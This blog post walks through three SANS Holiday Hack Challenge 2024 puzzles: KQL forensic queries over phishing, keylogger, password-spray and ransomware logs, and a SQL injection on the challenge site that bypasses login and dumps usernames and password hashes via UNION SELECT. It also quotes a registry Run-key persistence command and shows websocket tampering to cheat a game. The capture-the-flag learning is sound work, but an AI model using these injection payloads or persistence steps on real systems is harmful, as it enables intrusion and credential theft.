Monday, November 25, 2024

SANS: Holiday Hack 2024: Act 2: Microsoft KC7: Elf Conflict

Microsoft KC7: Elf Conflict

Silver

Type let's do this to begin your KQL training.

let's do this

when in doubt take 10

Employees
| take 10 

How many elves did you find? (Apparently Santa and Mrs Claus count as elves in this universe).

90

Employees
| count 

What is the name of the Chief Toy Maker?

Shinny Upatree

Employees
| where role=='Chief Toy Maker'

Type operator to continue.

operator

How many e-mails did Angel Candysalt receive? 

31

Email
| where recipient == "angel_candysalt@santaworkshopgeeseislands.org
| count

How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org? 

32

Email
| where sender has "twinkle_frostington@santaworkshopgeeseislands.org"
| distinct recipient
| count

How many distinct websites did Twinkle Frostington visit? 

4

To get the IP:

Employees
| where name == 'Twinkle Frostington'

Next, check the OutboundNetworkEvents

OutboundNetworkEvents
| where src_ip == "10.10.0.36"
| distinct url
| count

How many distinct domains in the PassiveDns records contain the word green? 

10

PassiveDns
| where domain contains 'green'
| distinct domain
| count

How many distinct URLs did elves with the first name Twinkle visit? 

8

let twinkle_ips =
Employees
| where name has "Twinkle"
| distinct ip_addr;
OutboundNetworkEvents 
| where src_ip in (twinkle_ips) 
| distinct url
| count

Answer 8 in KQL 101 in the badge.

Section 2: Operation Surrender - Alabaster's Espionage

Type surrender to continue:

surrender

Who was the sender of the phishing e-mail that set this plan into motion?

surrender@northpolemail.com

Email
| where subject contains "surrender"

How many elves from Team Wombley received the phishing email?

22

Email
| where subject contains "surrender"
| distinct recipient
| count

What was the filename of the document that Team Alabaster distributed in their phishing email?

Team_Wombley_Surrender.doc

Email
| where subject contains 'surrender'
| distinct link

Who was the first person from Team Wombley to click the URL in the phishing email? 

Joyelle Tinseltoe

Employees
| join kind=inner (
    OutboundNetworkEvents
) on $left.ip_addr == $right.src_ip // condition to match rows
| where url contains "Team_Wombley_Surrender.doc"
| project name, ip_addr, url, timestamp // project returns only the information you select
| sort by timestamp asc //sorts time ascending

What was the filename that was created after the .doc was downloaded and executed? 

keylogger.exe

ProcessEvents
| where timestamp between(datetime("2024-11-27T14:10:45Z") .. datetime("2024-11-27T14:12:45Z")) //you’ll need to modify this
| where hostname == "Elf-Lap-W-Tinseltoe"

Take your last answer and base64 encode it.

a2V5bG9nZ2VyLmV4ZQ==

let flag = "keylogger.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

Add a2V5bG9nZ2VyLmV4ZQ== to the Operation Silver part of the Microsoft KC7 Objective in the badge.

Silver achieved.

Gold

Section 3: Operation Snowfall - Team Wombley's Ransomware Raid

Type snowfall to begin

snowfall

What was the source IP associated with the password spray? 

59.171.58.12

AuthenticationEvents
| where result == "Failed Login"
| summarize FailedAttempts = count() by username, src_ip, result
| where FailedAttempts >= 5
| sort by FailedAttempts desc

How many unique accounts were impacted where there was a successful login from 59.171.58.12? 

23

AuthenticationEvents
| where src_ip=="59.171.58.12"
| where result=="Successful Login"
| distinct username
| count

What service was used to access these accounts/devices? 

RDP

AuthenticationEvents
| where src_ip=="59.171.58.12"
| where result=="Successful Login"
| distinct description

What file was exfiltrated on Alabaster's laptop? 

Secret_Files.zip

Attackers used RDP for the password spray at 2024-12-11T01:39:50Z, they did a little recon, but they didn't exfil the file until 12/16/24

AuthenticationEvents
| where src_ip=="59.171.58.12"
| where result=="Successful Login"
| where username=="alsnowball";
Employees
| where username=="alsnowball";
ProcessEvents
| where hostname == "Elf-Lap-A-Snowball"

What is the name of the malicious file that was run on Alabaster's laptop? 

EncryptEverything.exe

ProcessEvents
| where hostname == "Elf-Lap-A-Snowball"

Create the flag:

let flag = "EncryptEverything.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

Flag: RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl

Add RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl to the badge under the Microsoft KC7 Objective under Operation Snowball.

Section 4: Echos in the Frost: Tracking the Unknown Threat

Type stay frosty to begin:

stay frosty

What was the timestamp of the first phishing e-mail about breached credentils for Noel Boetie? 

2024-12-12T14:48:55Z

Email
| where recipient=="noel_boetie@santaworkshopgeeseislands.org"
| where subject contains "breach"

When did Noel Boetie click the link to the first file? 

2024-12-12T15:13:55Z

Email
| where recipient=="noel_boetie@santaworkshopgeeseislands.org"
| where subject contains "breach"
| distinct link;

https://holidaybargainhunt.io/published/files/files/echo.exe

Employees
| where name contains "Noel";
OutboundNetworkEvents
| where src_ip contains "10.10.0.9"

What was the IP for the domain where the file was hosted? 

182.56.23.122

PassiveDns
| where domain contains "holidaybargainhunt.io"

Let’s take a closer look at the authentication events. I wonder if any connection events from 182.56.23.122. If so what hostname was accessed? 

WebApp-ElvesWorkshop

AuthenticationEvents
| where src_ip=="182.56.23.122"

What was the script that was run to obtain credentials?  

Invoke-Mimikatz.ps1

In the process command line it shows powershell being used to download this script..

ProcessEvents
| where hostname=="WebApp-ElvesWorkshop"

What is the timestamp where Noel executed the file? 

2024-12-12T15:14:38Z

One of the filenames was echo.exe - Looking at the process events, that file was ran at: 2024-12-12T15:14:38Z

ProcessEvents
| where hostname=="Elf-Lap-A-Boetie"

What domain was holidaycandy.hta downloaded from? 

compromisedchristmastoys.com

OutboundNetworkEvents
| where url contains "holidaycandy.hta"

What was the first file that was created after extraction? 

sqlwriter.exe

After the holidaycandy.hta file is executed, the following registry key is created.

New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force | New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force

Notice that sqlwriter.exe is referenced.

ProcessEvents
| where hostname=="Elf-Lap-A-Boetie"

What is the name of the property assigned to the new registry key? 

frosty

Again, a registry key is created.

New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force | New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force

The name is frosty.

ProcessEvents
| where hostname=="Elf-Lap-A-Boetie"

Create the flag:

let flag = "frosty";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

The flag is: ZnJvc3R5

Add ZnJvc3R5 to the Echos in the Frost part of the Microsoft KC7 Objective in the badge.

Gold Achieved.


SANS: Holiday Hack 2024: Act 2: Drone Path Terminal

Drone Path

Silver

This terminal is near Chimney Scissorsticks in the game.

Hey. Psst, over here. Hey, I'm Chimney Scissorsticks.

I'm not liking all the tension brewing between the factions, so even though I agreed with how Wombley was handling things, I get the feeling this is going to end poorly for everyone. So I'm trying to get this data to Alabaster's side. Can you help?

Wombley's planning something BIG in that toy factory. He's not really making toys in there. He's building an armada of drones!

They're packed with valuable data from the elves working on the project. I think they hide the admin password in the drone flight logs. We need to crack this to prevent this escalating snowball showdown.

You'll be working with KML files, tracking drone flight paths. Intriguing, right? We need every detail to prepare for what’s ahead!

Use tools like Google Earth and some Python scripting to decode the hidden passwords and codewords locked in those files.

Ready to give it a go? It’s going to be a wild ride, and your skills might just turn the tide of this conflict!

The Elf Drone Workshop Terminal goes here: Elf Drone Workshop

When first accessing the Terminal:

Welcome to the Elf Drone Workshop!  Upload your drone logs for other analysts to analyze!  Our elves are working around the clock to get toys ready for Santa's sleigh.  Only verified pilots have access to the logs so remember to authenticate yourself.  

There's a drop-down Menu at the top right.  This menu has the following options: Login, FileShare, and Home.  

If the browser window is minimized, the navigation is slightly different: after clicking the 3 lines menu at the top right, there's a dropdown Menu that appears on the left instead.  

Go to the FileShare menu option and download the file.  

Many challenges have a SQL injection component.

Select the Login option and try Username: ' OR 1=1 -- and Password: abc

It appears as though this site is vulnerable to SQL injection because that injection above causes a successful login.  The menu options changed.  Now they are Home, FileShare, Workshop, Profile, Admin Console, and Logout.  Check to see if there were other files available in the file share.  There aren't.  Look at the Profile menu option.  Nothing interesting there.  Admin Console requires a code..  The Workshop page looks kind of interesting.  Elf Drone Workshop: Search for a Drone.  Then there's a textbox with a Search button.  Below that it displays "Drone Details".  Since it's the same developer that made the login screen, it could potentially be vulnerable to sql injection as well.  ' OR 1=1 -- in the search bar.  It outputs the following.

  • Name: ELF-HAWK, Quantity: 40, Weapons: Snowball-launcher
  • Name: Pigeon-Lookalike-v4, Quantity: 20, Weapons: Surveillance Camera
  • Name: FlyingZoomer, Quantity: 4, Weapons: Snowball-Dropper
  • Name: Zapper, Quantity: 5, Weapons: CarrotSpike

Comments for Zapper

  • This is sort of primitive, but it works!
Looking at the traffic, it goes here to do that.
https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=%27%20OR%201=1

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1

What if we change the query.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 1 -- 

The output is: []

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 2 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 3 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 4 -- 

Error Message

This table has three columns.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    },
    {
        "name": "ELF-HAWK",
        "quantity": "40",
        "weapons": "Snowball-launcher"
    },
    {
        "name": "FlyingZoomer",
        "quantity": "4",
        "weapons": "Snowball-Dropper"
    },
    {
        "name": "Pigeon-Lookalike-v4",
        "quantity": "20",
        "weapons": "Surveillance Camera"
    },
    {
        "name": "Zapper",
        "quantity": "5",
        "weapons": "CarrotSpike"
    }
]

Get rid of extra output we don't need.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Is there a users table?  Notice there is not space between users and the --.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null from users-- 

This output means there is a users table.  If there wasn't, there would be an error returned.
[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Testing to see what can be added to each field.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT 1,null,null from users-- 

[
    {
        "name": 1,
        "quantity": null,
        "weapons": null
    }
]

1 is allowed in the first field.  Will it accept a username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT username,null,null from users-- 

Error message, so no, it won't allow username.

What about the second field?  Will it allow username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,username,null from users--

Yup.

[
    {
        "name": 1,
        "quantity": "brynne",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "filo",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "fritjolf",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "lira",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "pip",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "sprigg",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "tylwen",
        "weapons": null
    }
]

What about passwords?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,password,null from users--

Yes it will. >:)

    {
        "name": 1,
        "quantity": "2bb7ab7713cc012f02eb03c95f6e4443",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "2fd03c8ea542a7fd85ca4ebbcc13d5ca",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "3c3a4f722ec77c1712941003443a4d83",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "4f7f1b7c49fa2b0cc22e2d2599f1f2e5",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "9eb6c13b1b18bc785ffb84d977bf5499",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "b9af6f935826ae1a89ecba72476fbcba",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "e54efff9e6258bef3eb35f093e3bae00",
        "weapons": null
    }
]

Looking at the hashes, only two show up as being cracked in online crackers: GUMDROP1 and RumbleInTheJungle.

Trying those passwords for the users:

fritjolf: GUMDROP1
pip: RumbleInTheJungle

Alternatively, the file in the file share can be downloaded and opened in Google Earth.  The flight path of that fml file spells out GUMDROP1.

Login as fritjolf - the file share still shows the same file.  However, in this profile there's a different file.

Note to self, remember drone name, it is the same location as secret snowball warehouses /files/secret/Preparations-drone-name.csv

Go to https://hhc24-dronepath.holidayhackchallenge.com/files/secret/Preparations-drone-name.csv

Download the file. (I already knew the name given that through the SQL injection, the drone name is called Elf-Hawk.  I downloaded that file already.  I didn't know that that's what this was alluding to though because I didn't follow the intended path to solve this one.)

Import the Preparations-drone-name.csv file into Google Earth.  Google has a nice wizard that assists with importing it.  The file is delimited, it's delimited by commas, the encoding is UTF-8, then check the rows/columns at the bottom to make sure they look ok.  Click next.

Then tell it the latitude and longitude which are the OSD.latitude and OSD.longitude respectively.  Click Finish.  It will ask if a template should be applied.  Click No.

This will load the data in.  On the left-hand side under Temporary Places, it will display Preparations-drone-name.csv.  Check the box next to it, and the points will show up on the globe.

At first, there doesn't seem to be a discernable pattern.  However, clicking on each point in the left-hand navigation bar, and looking at the landmarks shows letters.  Example, at the first point there are trees that look like the letter E.  At the second point there are trees or bushes that look like the letter L.  Keep looking at all the points, and eventually they spell out "ELF-HAWK".

Try the same SQL Injection on the Workshop page - just in case fritjolf could see different things.  Logged into pip and looked at their pages as well.  Neither one of them had access to the AdminConsole without a code.

Look at the comments for all the drones.  The important comments seem to be:

Comments for Pigeon-Lookalike-v4
This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Drone Details
These drones will work great to find Alabasters snowball warehouses. I have hid the activation code in the dataset ELF-HAWK-dump.csv. We need to keep it safe, for now it's under /files/secret.
We need to make sure we have enough of these drones ready for the upcoming operation. Well done on hiding the activation code in the dataset. If anyone finds it, it will take them a LONG time or forever to carve the data out, preferably the LATTER.

Open up ELF-HAWK-dump.csv in Google Earth Pro.  Unfortunately, on a globe, it doesn't really make much sense.  The hint about LONG and LATTER seems to refer to longitude and latitude.  Maybe mapping those on a 2D plane would work?  

There's a tool for studying Geographic Information called QGIS on Windows.  https://www.qgis.org/download/

In QGIS, go to Layer>Add Layer>Add Delimited Text Layer.  In the File Name, add the csv.  Encoding should be UTF-8.  In the File format, make sure the CSV radio is set.  In Geometry Coordinates, make sure that the Point Coordinates are set to what they should be Latitude: OSD Latitude and Longitude: OSD Longitude.  Geometry CRS should be set to Project CRS: EPSG:4326 - WGS 84.  Click Add.

Immediately after Add is clicked, a phrase appears: DroneDataAnalystExpertMedal.



Add this word to the badge for the Drone Path Terminal.

Silver Medal Achieved.

Gold

The path to the gold medal was given in the comments for the drones.

Comments for Pigeon-Lookalike-v4

This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Looking at the data in the ELF-HAWK-dump.csv, there are a lot of fields with TRUE and FALSE.  The comment mentions 'carvers'.  This could and likely indicates carving out the TRUE/FALSE data.  When thinking of TRUE/FALSE, 1/0 comes to mind, which is associated with binary.  That means there's binary data hidden in the csv.

Uploading the csv to CyberChef, it's possible to use CyberChef to carve out this data.  The recipe is the following:

https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','TRUE%7CFALSE',true,true,false,true,false,false,'List%20matches')Remove_whitespace(true,true,true,true,true,true)Find_/_Replace(%7B'option':'Regex','string':'TRUE'%7D,'1',true,true,false,false)Find_/_Replace(%7B'option':'Regex','string':'FALSE'%7D,'0',true,true,false,false)Remove_whitespace(true,true,true,true,true,false)From_Binary('Space',8)

Upload the ELF-HAWK-dump.csv file into CyberChef as input with that recipe.

Once that is done, an ascii art picture of a drone and the words CODEWORD=EXPERTTURKEYCARVERMEDAL


Add this phrase to the badge for the Drone Path Terminal.

Gold Medal Achieved.

SANS: Holiday Hack 2024: Act 2: Snowball Showdown

Snowball Showdown

Silver Medal

This challenge is in Act 2, The Front Yard, near Dusty Giftwrap.  

Hi there! I'm Dusty Giftwrap, back from the battlefield! I'm mostly here for the snowball fights!

But I also don't want Santa angry at us, you wouldn't like him when he's angry. His face becomes as red as his hat! So I guess I'm rooting for Alabaster.

Alabaster Snowball seems to be having quite a pickle with Wombley Cube. We need your wizardry.

Take down Wombley the usual way with a friend, or try a different strategy by tweaking client-side values for an extra edge.

Alternatively, we've got a secret weapon - a giant snow bomb - but we can't remember where we put it or how to launch it.

Adjust the right elements and victory for Alabaster can be secured with more subtlety. Intriguing, right?

Raring to go? Terrific! Here's a real brain tickler. Navigator of chaos or maestro of subtlety, which will you be? Either way, remember our objective: bring victory to Alabaster.

Confidence! Wit! We've got what it takes. Team up with a friend or find a way to go solo - no matter how, let's end this conflict and take down Wombley!


Click on the "We Want You" sign to see the game.  It's a snowball fight.  The goal is to hit Wombley more times than he hits Alabaster Snowball.

https://hhc24-snowballshowdown.holidayhackchallenge.com/?&challenge=termSnowballShowdown

This game can either be played with friends or alone.  When the game is first launched, it's in multi-player mode.  Clicking on Join a private room brings up more source code.  Keep in mind, viewing information in different browser tools may make the source code look different.

In Chrome, under Sources, there's a page that has: game.html?username=<Your user name>&roomId=<your room time>&roomType=private&id=<your id>… as the file name.

It shows this source regarding single player mode:

var singlePlayer = "false"

    function checkAndUpdateSinglePlayer() {

      const localStorageValue = localStorage.getItem('singlePlayer');

      if (localStorageValue === 'true' || localStorageValue === 'false') {

        singlePlayer = String(localStorageValue === 'true');

      }

      const urlParams = new URLSearchParams(window.location.search);

      const urlValue = urlParams.get('singlePlayer');

      if (urlValue === 'true' || urlValue === 'false') {

        singlePlayer = String(urlValue === 'true');

      }

    }

It looks like singlePlayer mode can be set in the url like this:

https://hhc24-snowballshowdown.holidayhackchallenge.com/game.html?username=<You Player Name>&roomId=<room id that was created>&roomType=private&singlePlayer=true

Good, now it can be tinkered around with without waiting for other players or disturbing them.

In the source, phaser-snowball-game.js, there's many parameters that can be tinkered with to give the player the advantage.

hhc24-snowballshowdown.holidayhackchallenge.com/js/phaser-snowball-game.js

Chrome or Firefox Developer Tools, or Burp could be useful for this challenge.  Overrides can be defined in Chrome or Firefox to load the local copy of a source instead of a remote copy.  That local copy can be manipulated.

Example:

Imagine changing the amount of time the elves are incapacitated (ie frozen), the blast radius is changed so that snowballs hit larger areas, throw speed and rate are manipulated,etc.

Unfortunately, only manipulating the settings in this script don't seem to earn silver.  

Watching the traffic in flight and manipulating web socket traffic seemed to do the trick.

The screen has a HACKER DETECTED MESSAGE when the player is doing something that will cause a win condition for silver.

mainScene.ws.sendMessage({"type":"snowballp","x":525,"y":918.5343627929688,"owner":"<player id generated in game>","isWomb":false,"blastRadius":200,"velocityX":957.5500105745144,"velocityY":-142.96013007093308,"id":285})

This changes the blast radius from 24 to 200 for the player and can be useful if the player aims at the same spot on the screen (ie has the line on top of where wombly could be).  Manipulating the phaser-snowball-game.js to have non-healing terrain and aiming straight for Wombley while repeatedly running the web sockets message up there tends to do an ok job of helping the elves win.

this.healingTerrain = true; to this.healingTerrain = false;

There are likely more efficient elegant ways to win, but it was enough to get a silver medal.

Gold Medal

Gold was considerably easier to get.  Dusty Giftwrap mentions finding a weapon.

Alternatively, we've got a secret weapon - a giant snow bomb - but we can't remember where we put it or how to launch it.

Searching the source code for "bomb" and there's many references to the bomb.  Considering we used websockets to get silver, it's a safe bet to look in websocket source.  In reconnecting-socket.min.js, there are a few references to bomber that look interesting.  Like this one for instance.

mainScene.bomberContainer = mainScene.add.container(400, 300),

What's happening above this?

It talks about a moasb.  How do we call this?

Looking at other references, it says this:

mainScene.ws.sendMessage({type: 'moasb', launch_code: '85e8e9729e2437c9d7d6addca68abb9f'})

However, running this alone doesn't seem to be enough to get gold, but it does give an idea of format.

mainScene.ws.sendMessage({type:'moasb'})

It doesn't seem to matter if it's called in correctly - the bomber is still spawned in, which causes 999 hits against Wombley and automatically wins the game.

Gold Metal Achieved.